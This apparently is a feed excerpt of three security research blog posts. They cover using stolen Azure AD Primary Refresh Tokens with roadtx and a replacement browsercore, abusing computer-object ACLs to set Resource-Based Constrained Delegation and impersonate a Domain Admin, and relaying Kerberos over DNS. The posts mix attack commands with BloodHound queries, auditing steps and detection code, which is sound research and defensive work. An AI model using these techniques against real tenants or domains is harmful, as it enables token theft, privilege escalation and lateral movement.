<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx browserprtinject -u newlowpriv@iminyour.cloud -r msgraph -c msteams
</code></pre></div></div>

<p>The issued access token will contain the <code class="language-plaintext highlighter-rouge">deviceid</code> claim, which identifies the device from which we stole the PRT. Since this device is Intune managed and compliant, it passes the compliance requirement:</p>

<p><img src="/assets/img/roadtx/logs_compliant.png" alt="Sign-in log showing the compliant device claim" /></p>

<h2 id="adding-mfa-claims-to-an-existing-prt">Adding MFA claims to an existing PRT</h2>
<p>Let’s move away from the PRTs that we stole and back to the PRT we registered earlier using a username and password. If we want a PRT with an MFA claim, we have to use an interactive session that will request a special refresh token from Azure AD for “enriching” our PRT. The command for this is <code class="language-plaintext highlighter-rouge">roadtx prtenrich</code>, which like the previous commands accepts an identity in a KeePass file to autofill the MFA information, or you can do this by hand.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prtenrich -u newlowpriv@iminyour.cloud
Got refresh token. Can be used to request prt with roadtx prt -r &lt;refreshtoken&gt;
</code></pre></div></div>

<p>The result is a special refresh token that we can use to request a new PRT. For this we go back to the <code class="language-plaintext highlighter-rouge">roadtx prt</code> module:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prt -r &lt;refreshtoken&gt; -c blogdevice.pem -k blogdevice.key
</code></pre></div></div>

<p>The new PRT is written to disk and when we use it to request tokens we see the MFA claim:</p>

<p><img src="/assets/img/roadtx/roadtx_prtmfa.png" alt="New PRT with MFA capabilities" /></p>

<p>We can use this PRT to obtain tokens for resources that require MFA using any of the above methods.</p>

<h1 id="single-sign-on-in-windows-using-chrome-and-a-custom-browsercore">Single sign on in Windows using Chrome and a custom browsercore</h1>
<p>In my <a href="https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/">first blog on PRTs</a> I described the process that Chrome uses to do Single Sign On in Windows. It uses the <code class="language-plaintext highlighter-rouge">browsercore.exe</code> helper program to request PRT cookies to sign in automatically. For roadtx I wrote a small utility called <code class="language-plaintext highlighter-rouge">browsercore.py</code>, which can be used as a replacement for <code class="language-plaintext highlighter-rouge">browsercore.exe</code>. By doing so, you can use a Primary Refresh Token from roadtx (or one that you stole elsewhere) to automatically authenticate in your Chrome browser on your attacker-controlled host. You don’t need a Selenium window, but can use the PRT directly, just as if you were in a legitimate browser on the victim’s machine.</p>

<p>The custom SSO requires a few steps to set up:</p>

<ul>
  <li>You should put the <code class="language-plaintext highlighter-rouge">browsercore.py</code> and <code class="language-plaintext highlighter-rouge">manifest.json</code> <a href="https://github.com/dirkjanm/ROADtools/tree/master/browsercore">files</a> in some location on disk, for example in <code class="language-plaintext highlighter-rouge">C:\browsercore\</code>.</li>
  <li>Install roadtx and place a <code class="language-plaintext highlighter-rouge">roadtx.prt</code> file in the same directory.</li>
  <li>Modify <code class="language-plaintext highlighter-rouge">HKEY_CURRENT_USER\Software\Google\Chrome\NativeMessagingHosts\com.microsoft.browsercore</code> to point to <code class="language-plaintext highlighter-rouge">C:\browsercore\manifest.json</code>.</li>
  <li>Test whether everything works using <code class="language-plaintext highlighter-rouge">bctest.py</code></li>
  <li>Clear any existing cookies in Chrome for <code class="language-plaintext highlighter-rouge">login.microsoftonline.com</code></li>
</ul>
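<p>For reference, the native messaging host manifest that the registry key points Chrome to looks roughly like the sketch below. The <code class="language-plaintext highlighter-rouge">path</code> value (and the wrapper it points to) is an assumption for illustration, and the extension ID shown should be the “Windows 10 Accounts” extension; verify both against the <code class="language-plaintext highlighter-rouge">manifest.json</code> shipped in the ROADtools repository:</p>

```python
import json

# Hypothetical manifest generator; the field names follow Chrome's native
# messaging host format. The path and extension ID below are assumptions:
# check them against the manifest.json from the ROADtools repository.
manifest = {
    "name": "com.microsoft.browsercore",
    "description": "BrowserCore",
    "path": "C:\\browsercore\\browsercore.bat",  # assumed wrapper that starts browsercore.py
    "type": "stdio",
    "allowed_origins": ["chrome-extension://ppnbnpeolgkicgegkbkbjmhlideopiji/"],
}

with open("manifest.json", "w") as fh:
    json.dump(manifest, fh, indent=2)
```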

<p>Full install instructions are on the <a href="https://github.com/dirkjanm/ROADtools/wiki/Setting-up-BrowserCore.py">ROADtools wiki</a>. After setup, Chrome should use the PRT automatically during sign in. The first time it may need a hint for the username to work properly.</p>

<p>With this setup you can browse any Azure AD connected resource with SSO and the claims from the PRT, including device status and cached MFA information.</p>

<h1 id="other-utilities">Other utilities</h1>
<p>There are a few other utilities in roadtx, mostly to make my own research easier:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">roadtx decrypt</code> can decrypt encrypted responses given a PRT session key or a device transport key</li>
  <li><code class="language-plaintext highlighter-rouge">roadtx getotp</code> can calculate an OTP code from a seed or from the otp property stored in a KeePass file (if you need to do MFA for that user)</li>
  <li><code class="language-plaintext highlighter-rouge">roadtx codeauth</code> can perform the OAuth2 code redemption flow for public and confidential clients.</li>
  <li><code class="language-plaintext highlighter-rouge">roadtx listaliases</code> lists all the aliases that are supported for resources and clients. If you need any other aliases that you use frequently feel free to open an issue or send me a message.</li>
</ul>

<h1 id="tool-download-future-work-and-credits">Tool download, future work and credits</h1>
<p>As always the tools are available and open source on <a href="https://github.com/dirkjanm/ROADtools">GitHub</a> and on PyPI with <code class="language-plaintext highlighter-rouge">pip install roadtx</code>. This toolkit was developed during my research of the past years and I will keep adding new stuff to it as that research progresses. Many of the commands currently only work in managed environments (so not in federated ones), simply because I have not had the time yet to set up a lab with federation.</p>

<p>Thanks to <a href="https://twitter.com/DrAzureAD">DrAzureAD</a> for developing <a href="https://aadinternals.com/aadinternals/">AADInternals</a>, which inspired the initial device registration development and was a helpful resource on several implementation details. Also a shoutout to <a href="https://github.com/rvrsh3ll/TokenTactics">TokenTactics</a> which implements many token request/refresh related flows in PowerShell.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[Ever since the initial release of ROADrecon and the ROADtools framework I have been adding new features to it, especially on the authentication side. As a result, it supports many forms of authentication, such as using Primary Refresh Tokens (PRTs), PRT cookies, and regular access/refresh tokens. The authentication modules are all part of the shared library roadlib, and can be used in other tools by importing the library. Even though you can request tokens for any Azure AD connected resource and with many client IDs, the only tool exposing this authentication part was ROADrecon. It always felt unnatural and illogical to tell people that you can use a recon tool to request tokens for many other purposes. So I decided to start writing a new tool, which revolves around requesting and using Azure AD tokens. As I was working on this, I started adding proof of concepts I wrote during my Azure AD devices research into the tool, adding support for registering devices and requesting Primary Refresh Tokens using device credentials. I also added various modules for injecting PRTs into browser sessions with Selenium, and for automating authentication with MFA. The result is a comprehensive tool called ROADtools Token eXchange, or simply roadtx.
Currently it has the following capabilities:]]></summary></entry><entry><title type="html">Abusing forgotten permissions on computer objects in Active Directory</title><link href="https://dirkjanm.io/abusing-forgotten-permissions-on-precreated-computer-objects-in-active-directory/" rel="alternate" type="text/html" title="Abusing forgotten permissions on computer objects in Active Directory" /><published>2022-07-11T16:08:57+00:00</published><updated>2022-10-27T08:08:57+00:00</updated><id>https://dirkjanm.io/abusing-forgotten-permissions-on-precreated-computer-objects-in-active-directory</id><content type="html" xml:base="https://dirkjanm.io/abusing-forgotten-permissions-on-precreated-computer-objects-in-active-directory/"><![CDATA[<p>A while back, I read an interesting blog by <a href="https://twitter.com/Oddvarmoe">Oddvar Moe</a> about <a href="https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/">Pre-created computer accounts</a> in Active Directory. In the blog, Oddvar also describes the option to configure who can join the computer to the domain after the object is created. This sets an interesting ACL on computer accounts, allowing the principal who gets those rights to reset the computer account password via the “All extended rights” option. That sounded quite interesting, so I did some more digging into this and found there are more ACLs set when you use this option, which not only allows this principal to reset the password but also to configure Resource-Based Constrained Delegation. BloodHound was missing this ACL, and I dug into why, which I’ve written up in this short blog. If an environment is sufficiently large (and/or old), someone at some point likely added a few systems to the domain with this option set to “Everyone” or “Authenticated Users”, allowing all users in the domain to join the computer to the domain. 
Whoever configured this probably did not realize this would also give everyone specific permissions on the object after it is joined to the domain. The logic to analyze this is now included in the <a href="https://github.com/fox-it/BloodHound.py">BloodHound.py</a> data gatherer, as well as a <a href="https://github.com/BloodHoundAD/SharpHoundCommon/pull/34">Pull Request</a> for SharpHound. If this misconfiguration is present in a domain, it may give you access to servers from any user. This makes for an easy first step in lateral movement. Along the way, I discovered more cases in which these ACEs were present, so in any larger environment, there’s a good chance that unintended users have some lingering permissions on computer objects. This post includes some queries to use in BloodHound, as well as some recommended mitigations.</p>

<p><img src="/assets/img/computeracl/join.png" alt="Everyone can join this to the domain" class="align-center" /></p>

<h1 id="background">Background</h1>
<p>After reading Oddvar’s blog, I wondered what rights are granted to users when the option “The following user or group can join this computer to the domain” is used. So I did some tests and set this value to a newly created user “computeracltest”. After creating this computer object, we see that various Access Control Entries (ACEs) are set on the new computer, granting rights to the account we chose. As usual, the GUI is not really helpful here, since it shows weird blank values and some instances of “special”, which are quite ambiguous.</p>

<p><img src="/assets/img/computeracl/aclview.png" alt="The ACEs set on the new object" class="align-center" /></p>

<p>The “effective access” view is more practical and shows us some interesting additional information: the user can write to the <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code> attribute, which is the attribute that gives us access to configure Resource-Based Constrained Delegation.</p>

<p><img src="/assets/img/computeracl/effectiveaccess.png" alt="Effective access showing RBCD rights" class="align-center" /></p>

<p>How we got that access is not quite clear from the ACE view. Some of the ACEs may not be adequately understood by the GUI. So instead, let us look at the raw ACL and what its entries mean. My preferred tool to make these entries readable is the ACL parsing logic of BloodHound.py, which has extensive parsing and debug printing built in. Because I did this analysis with a newly created user, the only ACEs that matter are those set for that specific user. By printing every ACE that applies to this user’s SID, which can be done by <a href="https://github.com/fox-it/BloodHound.py/blob/dev/bloodhound/enumeration/acls.py#L82">modifying these lines</a> in BloodHound.py, we can see exactly which ACEs we have.</p>

<p><img src="/assets/img/computeracl/acelist.png" alt="List of ACEs on our computer object for our test user" class="align-center" /></p>

<p>The ACEs can be separated by type, which is based on the flags of the ACE. ACE numbers 1-4 and 7 have the flag <code class="language-plaintext highlighter-rouge">ADS_RIGHT_DS_WRITE_PROP</code>, which indicates that this ACE controls access for writing to a property, indicated by the GUID in <code class="language-plaintext highlighter-rouge">ObjectType</code>. ACE numbers 5 and 6 have the <code class="language-plaintext highlighter-rouge">ADS_RIGHT_DS_SELF</code> flag, which is a somewhat confusing name for a validated write according to the <a href="https://docs.microsoft.com/en-us/windows/win32/api/iads/ne-iads-ads_rights_enum">documentation</a>. Validated writes also allow you to write to a property, but the write is subject to additional validation. An example is ACE number 5, which is the validated write to the DNS hostname with <a href="https://docs.microsoft.com/en-us/windows/win32/adschema/r-validated-dns-host-name">restrictions</a>. ACE number 8 is a simpler ACE, not restricted to a specific property, but with the <code class="language-plaintext highlighter-rouge">ADS_RIGHT_DS_CONTROL_ACCESS</code> flag. This flag controls extended rights, and since there is no specific extended right specified, this ACE grants the “all extended rights” permissions that Oddvar wrote about in his blog.</p>
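<p>The flags mentioned above are bits in the ACE’s access mask. A small sketch that labels the bits relevant here, with values taken from the <code class="language-plaintext highlighter-rouge">ADS_RIGHTS_ENUM</code> documentation:</p>

```python
# Access-mask bits from ADS_RIGHTS_ENUM that are relevant to this analysis
ADS_RIGHTS = {
    0x008: "ADS_RIGHT_DS_SELF",            # validated write
    0x010: "ADS_RIGHT_DS_READ_PROP",
    0x020: "ADS_RIGHT_DS_WRITE_PROP",      # write to the property in ObjectType
    0x100: "ADS_RIGHT_DS_CONTROL_ACCESS",  # (all) extended rights
}

def decode_mask(mask):
    """Return the names of the known access rights set in an ACE access mask."""
    return [name for bit, name in ADS_RIGHTS.items() if mask & bit]

print(decode_mask(0x20))  # → ['ADS_RIGHT_DS_WRITE_PROP']
```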

<p>Ignoring these leaves us with a few ACEs to inspect, each of which grants write access to a specific property. The property IDs are mapped to names in the Active Directory schema, but we can also put the GUIDs in Google to find the corresponding property in the Microsoft documentation. This gives the following properties:</p>

<ol>
  <li><code class="language-plaintext highlighter-rouge">5F202010-79A5-11D0-9020-00C04FC2D4CF</code>: <a href="https://docs.microsoft.com/en-us/windows/win32/adschema/r-user-logon">User-Logon property set</a>.</li>
  <li><code class="language-plaintext highlighter-rouge">BF967950-0DE6-11D0-A285-00AA003049E2</code>: <a href="https://docs.microsoft.com/en-us/windows/win32/adschema/a-description">Description attribute</a>.</li>
  <li><code class="language-plaintext highlighter-rouge">BF967953-0DE6-11D0-A285-00AA003049E2</code>: <a href="https://docs.microsoft.com/en-us/windows/win32/adschema/a-displayname">Display-Name attribute</a>.</li>
  <li><code class="language-plaintext highlighter-rouge">3E0ABFD0-126A-11D0-A060-00AA006C33ED</code>: <a href="https://docs.microsoft.com/en-us/windows/win32/adschema/a-samaccountname">SAM-Account-Name attribute</a>.</li>
  <li>Validated write to DNS host name (I’ve written about <a href="https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/">this right</a> before).</li>
  <li>Validated write to service principal name.</li>
  <li><code class="language-plaintext highlighter-rouge">4C164200-20C0-11D0-A768-00AA006E0529</code>: <a href="https://docs.microsoft.com/en-us/windows/win32/adschema/r-user-account-restrictions">User-Account-Restrictions property set</a>.</li>
</ol>

<p>The above pages give us several attributes, but none that make it clear why we have the rights on the <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code> attribute. For this, we have to dig deeper into numbers 1 and 7, which are property sets instead of single attributes.</p>

<h2 id="property-sets-in-active-directory">Property sets in Active Directory</h2>
<p>If you don’t know what property sets are or how exactly they work, don’t worry, I didn’t either before diving into this. Some searching in the <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/177c0db5-fa12-4c31-b75a-473425ce9cca">documentation</a> teaches us that a property set maps to multiple properties, so you don’t have to create an ACE for every single property you want to grant access to. Unfortunately, the documentation for the property sets linked in the list above is not updated beyond Server 2012, so it doesn’t tell us what properties are included in these sets on more modern OS versions. Back to querying this from the AD schema, where all these properties are defined. When we look at the properties of the <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code> attribute, we see that it references <code class="language-plaintext highlighter-rouge">attributeSecurityGUID</code> <code class="language-plaintext highlighter-rouge">4C164200-20C0-11D0-A768-00AA006E0529</code>:</p>

<p><img src="/assets/img/computeracl/securityguid.png" alt="Allowed to act property privileges part of a property set" class="align-center" /></p>

<p>This is the same GUID we saw for the “User-Account-Restrictions” property set in ACE number 7 above. A look at the Extended Rights configured in the Configuration partition of AD shows us the same GUID for the User-Account-Restrictions property set.</p>

<p><img src="/assets/img/computeracl/rightsguid.png" alt="GUID of the user account restrictions property set" class="align-center" /></p>

<p>We can use this information to reconstruct all the property sets and the properties they contain in the default AD schema by creating a mapping between the properties and their set (if any). I’ve written a short <a href="https://gist.github.com/dirkjanm/5e1e525c35ac846fa304eaa02c871c00">python script</a> that does just that, which gives us all the attributes contained in the User-Account-Restrictions property set, including <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code>.</p>

<p><img src="/assets/img/computeracl/uarset.png" alt="All attributes in the user account restrictions property set" class="align-center" /></p>
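<p>One practical detail when querying the schema yourself: AD returns <code class="language-plaintext highlighter-rouge">attributeSecurityGUID</code> (and <code class="language-plaintext highlighter-rouge">schemaIDGUID</code>) as a binary, little-endian GUID, so it has to be converted before comparing it against the documented values. A sketch of that conversion:</p>

```python
import uuid

def guid_from_ad_bytes(raw):
    """Convert a binary (little-endian) GUID as stored in AD to its string form."""
    return str(uuid.UUID(bytes_le=raw)).upper()

# Round-trip the User-Account-Restrictions property set GUID as an example
raw = uuid.UUID("4C164200-20C0-11D0-A768-00AA006E0529").bytes_le
print(guid_from_ad_bytes(raw))  # → 4C164200-20C0-11D0-A768-00AA006E0529
```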

<p>With this, we can conclude that it’s ACE number 7 that gives us the rights to modify the <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code> attribute, which allows us to configure Resource-Based Constrained Delegation.</p>

<h1 id="abusing-the-everyone-case-and-more-abuse-options">Abusing the “Everyone” case and more abuse options</h1>
<p>To go back to our original idea, when an admin adds a computer to the domain and gives “everyone” or “authenticated users” the permission to join the computer to the domain, these groups also get the permission to configure RBCD. If we add this extra logic to the BloodHound data collector and run it again, we will see these new “AddAllowedToAct” edges showing up in our data. There is a second case in which these permissions get set, which is when a computer object is created via LDAP, in which case the user that created the account will get the permissions that allow them to configure RBCD. This may be another lateral movement opportunity in case an attacker compromises an account that is commonly used to join machines to the domain.</p>

<p>After adding the new ACL property logic to BloodHound.py, and diffing the output with SharpHound, we see the extra <code class="language-plaintext highlighter-rouge">AddAllowedToAct</code> edges showing up:</p>

<p><img src="/assets/img/computeracl/datadiff.png" alt="More ACL info" class="align-center" /></p>

<p>Loading this data into BloodHound, we can use the following query to find our nice new edges. <strong>Note:</strong> the edge was renamed to <code class="language-plaintext highlighter-rouge">WriteAccountRestrictions</code> after merging into the main BloodHound code. Both SharpHound and BloodHound.py now report this as <code class="language-plaintext highlighter-rouge">WriteAccountRestrictions</code>, so the queries below use the new name instead of the <code class="language-plaintext highlighter-rouge">AddAllowedToAct</code> naming used above:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MATCH p=(g)-[:WriteAccountRestrictions]-&gt;(c:Computer) WHERE NOT g.highvalue RETURN p
</code></pre></div></div>

<p>Or to focus on cases exploitable from any authenticated user, the following query is useful:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MATCH p=(g)-[:WriteAccountRestrictions]-&gt;(c:Computer) WHERE g.objectid ENDS WITH "S-1-1-0" OR g.objectid ENDS WITH "-513" OR g.objectid ENDS WITH "S-1-5-11" OR g.objectid ENDS WITH "-515" RETURN p
</code></pre></div></div>
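<p>The SID suffixes in the query above correspond to well-known broad principals. If you prefer filtering raw collector output instead of using Cypher, the same check can be sketched in Python (an illustrative helper, not part of BloodHound.py):</p>

```python
# Well-known SIDs / RIDs matched by the Cypher query above
LOW_PRIV_SUFFIXES = {
    "S-1-1-0": "Everyone",
    "S-1-5-11": "Authenticated Users",
    "-513": "Domain Users",
    "-515": "Domain Computers",
}

def low_priv_principal(sid):
    """Return the well-known group name if the SID is one of the broad
    principals from the query, or None otherwise."""
    for suffix, name in LOW_PRIV_SUFFIXES.items():
        if sid.endswith(suffix):
            return name
    return None

print(low_priv_principal("S-1-5-21-1004336348-1177238915-682003330-513"))  # → Domain Users
```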

<p>This shows the following result in my test lab, since I added a computer with the “everyone” permissions to the domain:</p>

<p><img src="/assets/img/computeracl/bhresults.png" alt="Edge in BloodHound" class="align-center" /></p>

<p>We can configure RBCD by modifying the object over LDAP, for example by using <code class="language-plaintext highlighter-rouge">rbcd.py</code> from <a href="https://github.com/SecureAuthCorp/impacket/">impacket</a>. As a general reminder: to exploit this, you would need access to a computer account in most cases, which you can obtain either by dumping the credentials of an existing host from the registry, or by registering a new computer object in AD if that is allowed (which it is by default). In this case, I’m abusing <code class="language-plaintext highlighter-rouge">ICORP-W10</code> as an account for which I dumped the password.</p>

<p><img src="/assets/img/computeracl/writerbcd.png" alt="Modify the object to allow RBCD" class="align-center" /></p>

<p>As the last step, we can obtain a service ticket impersonating a Domain Admin account to access the victim host:</p>

<p><img src="/assets/img/computeracl/silverticket.png" alt="Request ticket impersonating an admin via RBCD" class="align-center" /></p>

<p>If this were a real computer instead of only a pre-created account, we could use this ticket to log in over SMB and, for example, run secretsdump.</p>

<h1 id="mitigating-and-monitoring">Mitigating and monitoring</h1>
<p>If you’re on the blue side, you can perform the same BloodHound queries to identify misconfigured computer objects. For the actual mitigation, remove the vulnerable ACEs on these objects. I recommend removing any ACE that was set to allow the specific user or group to domain join the computer; these are similar to the screenshot at the beginning of this blog and are all scoped to that user/group and set to “This object only”. At the minimum, remove the <strong>Write account restrictions</strong> and the <strong>Special</strong> (which means “All extended rights” in this case) ACEs.</p>

<p>Modifying the <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code> attribute is not monitored by default in AD. Assuming you already have “Audit Directory Service Changes” audit logging enabled, an auditing entry (SACL) needs to be added to monitor changes to this attribute. You could configure this on the domain root or on all OUs/containers that contain computer objects. It should apply to “Descendant computer objects” and the property to monitor is <em>Write msDS-AllowedToActOnBehalfOfOtherIdentity</em> as shown below:</p>

<p><img src="/assets/img/computeracl/auditing_1.png" alt="Configure auditing" class="align-center" />
<img src="/assets/img/computeracl/auditing_2.png" alt="Configure auditing 2" class="align-center" /></p>

<p>Once this is set up, event ID 5136 will be logged whenever RBCD is changed on a computer object, which should rarely occur since I’ve yet to hear from someone using this legitimately.</p>

<p><img src="/assets/img/computeracl/auditing_3.png" alt="RBCD modification event" class="align-center" /></p>
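<p>Once the SACL is in place, the resulting 5136 events can be triaged automatically. Below is a minimal sketch that extracts the relevant fields from the event XML with the Python standard library. The sample event is synthetic and trimmed to only the fields the parser reads, but the <code class="language-plaintext highlighter-rouge">Data Name</code> attributes follow the 5136 event schema:</p>

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

def rbcd_change(event_xml: str):
    """Return (object DN, acting account) if a 5136 event records a write to
    msDS-AllowedToActOnBehalfOfOtherIdentity, else None."""
    root = ET.fromstring(event_xml)
    data = {d.get("Name"): d.text
            for d in root.findall(".//e:EventData/e:Data", NS)}
    if data.get("AttributeLDAPDisplayName") == "msDS-AllowedToActOnBehalfOfOtherIdentity":
        return data.get("ObjectDN"), data.get("SubjectUserName")
    return None

# Synthetic 5136 event, trimmed to the fields the parser reads
SAMPLE = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <EventData>
    <Data Name="SubjectUserName">ICORP-W10$</Data>
    <Data Name="ObjectDN">CN=VICTIM,OU=Servers,DC=internal,DC=corp</Data>
    <Data Name="AttributeLDAPDisplayName">msDS-AllowedToActOnBehalfOfOtherIdentity</Data>
  </EventData>
</Event>"""
```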

<h1 id="other-changes-to-bloodhoundpy">Other changes to BloodHound.py</h1>
<p>This feature is now present in version 1.3.0 of BloodHound.py, which is available from <a href="https://github.com/fox-it/BloodHound.py">GitHub</a> or via PyPI. Several other improvements and optimizations are included in this release:</p>

<ul>
  <li>Session enumeration via the HKU registry hive is now supported thanks to <a href="https://twitter.com/itm4n">@itm4n</a>.</li>
  <li>BloodHound.py will automatically split output into multiple JSON files, preventing the huge files from large networks that crash the GUI during ingestion.</li>
  <li>When doing DCOnly collection, BloodHound.py will use its memory more efficiently and not cache everything when not needed.</li>
  <li>You can now supply a file with computer hostnames for session/loggedon/etc enumeration that will restrict enumeration to only those computers.</li>
  <li>Connections to LDAP that time out/are lost during data gathering are automatically re-established if possible.</li>
  <li>A new tool <code class="language-plaintext highlighter-rouge">createforestsidcache.py</code> is available that creates a cache of all objects in the entire forest. This creates massive speedups for multi-domain AD environments with a lot of cross-domain privileges.</li>
  <li>Bugfixes and general improvements.</li>
  <li>Python 2 support has been dropped; only Python 3 is supported now.</li>
</ul>

<p>Something that is not quite new but was not publicly announced before is BloodHound.py’s capability to gather information about credentials stored on hosts in scheduled tasks or as part of services. While this method requires administrator privileges, it can surface recoverable credentials on hosts that other session collection methods would miss. You can activate it by adding <code class="language-plaintext highlighter-rouge">experimental</code> to your list of collection methods.</p>

<h1 id="tools">Tools</h1>
<p>The new ACL edge has been added to both BloodHound.py and the official BloodHound and its SharpHound data collector. The edge was renamed to <code class="language-plaintext highlighter-rouge">WriteAccountRestrictions</code> for clarity. If you have the latest version of BloodHound it should support this out-of-the-box without additional requirements. I think this kind of attack pattern may be common in the wild, but I don’t have any solid data on it, so if you come across instances of this configuration in real environments (either from the red side or the blue side), please let me know!</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[A while back, I read an interesting blog by Oddvar Moe about Pre-created computer accounts in Active Directory. In the blog, Oddvar also describes the option to configure who can join the computer to the domain after the object is created. This sets an interesting ACL on computer accounts, allowing the principal who gets those rights to reset the computer account password via the “All extended rights” option. That sounded quite interesting, so I did some more digging into this and found there are more ACLs set when you use this option, which not only allows this principal to reset the password but also to configure Resource-Based Constrained Delegation. BloodHound was missing this ACL, and I dug into why, which I’ve written up in this short blog. If an environment is sufficiently large (and/or old), someone at some point likely added a few systems to the domain with this option set to “Everyone” or “Authenticated Users”, allowing all users in the domain to join the computer to the domain. Whoever configured this probably did not realize this would also give everyone specific permissions on the object after it is joined to the domain. The logic to analyze this is now included in the BloodHound.py data gatherer, as well as a Pull Request for SharpHound. 
If this misconfiguration is present in a domain, it may give you access to servers from any user. This makes for an easy first step in lateral movement. Along the way, I discovered more cases in which these ACEs were present, so in any larger environment, there’s a good chance that unintended users have some lingering permissions on computer objects. This post includes some queries to use in BloodHound, as well as some recommended mitigations.]]></summary></entry><entry><title type="html">Relaying Kerberos over DNS using krbrelayx and mitm6</title><link href="https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/" rel="alternate" type="text/html" title="Relaying Kerberos over DNS using krbrelayx and mitm6" /><published>2022-02-22T18:08:57+00:00</published><updated>2022-02-22T18:08:57+00:00</updated><id>https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6</id><content type="html" xml:base="https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/"><![CDATA[<p>One thing I love is when I think I understand a topic well, and then someone proves me quite wrong. That was more or less what happened when James Forshaw published <a href="https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html">a blog on Kerberos relaying</a>, which disproves my conclusion that you can’t relay Kerberos from a <a href="https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/">few years ago</a>. James showed that there are some tricks to make Windows authenticate to a different Service Principal Name (SPN) than what would normally be derived from the hostname the client is connecting to, which means Kerberos is not fully relay-proof as I assumed. This triggered me to look into some alternative abuse paths, including something I worked on a few years back but could never get to work: relaying DNS authentication. 
This is especially relevant when you have the ability to spoof a DNS server via DHCPv6 spoofing with mitm6. In this scenario, you can get victim machines to reliably authenticate to you using Kerberos and their machine account. This authentication can be relayed to any service that does not enforce integrity, such as Active Directory Certificate Services (AD CS) http(s) based enrollment, which in turn makes it possible to execute code as SYSTEM on that host as discussed in my blog on <a href="https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/">AD CS relaying</a>. This technique is faster, more reliable and less invasive than relaying WPAD authentication with mitm6, but does of course require AD CS to be in use. This blog describes the background of the technique and the changes I made to krbrelayx to support Kerberos relaying for real this time.</p>

<h1 id="kerberos-over-dns">Kerberos over DNS</h1>
<p>If you’re familiar with Kerberos you know that DNS is a critical component in having a working Kerberos infrastructure. But did you know that DNS in Active Directory also supports authenticated operations over DNS using Kerberos? This is part of the “Secure dynamic updates” operation, which is used to keep the DNS records of network clients with dynamic addresses in sync with their current IP address. The following image shows the steps involved in the dynamic update process:</p>

<p><img src="/assets/img/kerberos/krbdns_overview.png" alt="Kerberos over DNS" class="align-center" /></p>

<p>The steps are as follows (following the packets above from top to bottom). In this exchange the client is a Windows 10 workstation and the server is a Domain Controller with the DNS role.</p>

<ol>
  <li>The client queries for the Start Of Authority (SOA) record for its name, which indicates which server is authoritative for the domain the client is in.</li>
  <li>The server responds with the DNS server that is authoritative, in this case the DC <code class="language-plaintext highlighter-rouge">icorp-dc.internal.corp</code>.</li>
  <li>The client attempts a dynamic update on the A record with their name in the zone <code class="language-plaintext highlighter-rouge">internal.corp</code>.</li>
  <li>This dynamic update is refused by the server because no authentication is provided.</li>
  <li>The client uses a <code class="language-plaintext highlighter-rouge">TKEY</code> query to negotiate a secret key for authenticated queries.</li>
  <li>The server answers with a <code class="language-plaintext highlighter-rouge">TKEY</code> Resource Record, which completes the authentication.</li>
  <li>The client sends the dynamic update again, but now accompanied by a <code class="language-plaintext highlighter-rouge">TSIG</code> record, which is a signature using the key established in steps 5 and 6.</li>
  <li>The server acknowledges the dynamic update. The new DNS record is now in place.</li>
</ol>
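<p>For reference, the unsigned dynamic update from step 3 is a plain RFC 2136 UPDATE message (opcode 5). The steps above can be sketched on the wire with only the Python standard library; names and values below are illustrative:</p>

```python
import struct

def encode_name(name: str) -> bytes:
    """DNS wire encoding: length-prefixed labels, null-terminated."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode()
    return out + b"\x00"

def build_dynamic_update(zone: str, fqdn: str, ip: str, txid: int = 0x1337) -> bytes:
    """Unsigned RFC 2136 dynamic update adding an A record (step 3 above);
    the server answers REFUSED, which triggers the TKEY negotiation."""
    # Header: opcode 5 (UPDATE), 1 zone, 0 prerequisites, 1 update, 0 additional
    pkt = struct.pack(">HHHHHH", txid, 5 << 11, 1, 0, 1, 0)
    # Zone section: <zone> SOA IN
    pkt += encode_name(zone) + struct.pack(">HH", 6, 1)
    # Update section: <fqdn> A IN, TTL 1200, 4-byte rdata (the IPv4 address)
    pkt += encode_name(fqdn) + struct.pack(">HHIH", 1, 1, 1200, 4)
    pkt += bytes(int(o) for o in ip.split("."))
    return pkt
```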

<p>Let’s take a closer look at steps 5 and 6. The TKEY query is actually sent over TCP because it’s quite a bit larger than the maximum 512 bytes allowed over UDP. This is primarily because of the rather large TKEY additional record, which contains structures we often see for Kerberos authentication:</p>

<p><img src="/assets/img/kerberos/dns_tkey.png" alt="TKEY query containing AP-REQ structure" class="align-center" /></p>

